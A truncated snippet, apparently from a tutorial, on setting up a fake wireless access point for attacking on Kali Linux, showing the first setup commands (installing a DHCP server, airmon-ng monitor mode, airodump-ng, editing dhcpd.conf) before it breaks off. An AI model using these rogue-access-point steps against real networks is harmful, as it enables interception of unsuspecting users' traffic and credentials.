Create fake AP for attacking on Kali Linux

Create fake AP for attacking on Kali Linux  1. Install isc-dhcp-server apt-get install isc-dhcp-server 2. Set monitor mode airmon-ng check kill airmon-ng start wlan0 airodump-ng wlan0mon 3. Configure dhcpd.conf leafpad /etc/dhcp/dhcpd.conf authoritative; default-lease-time...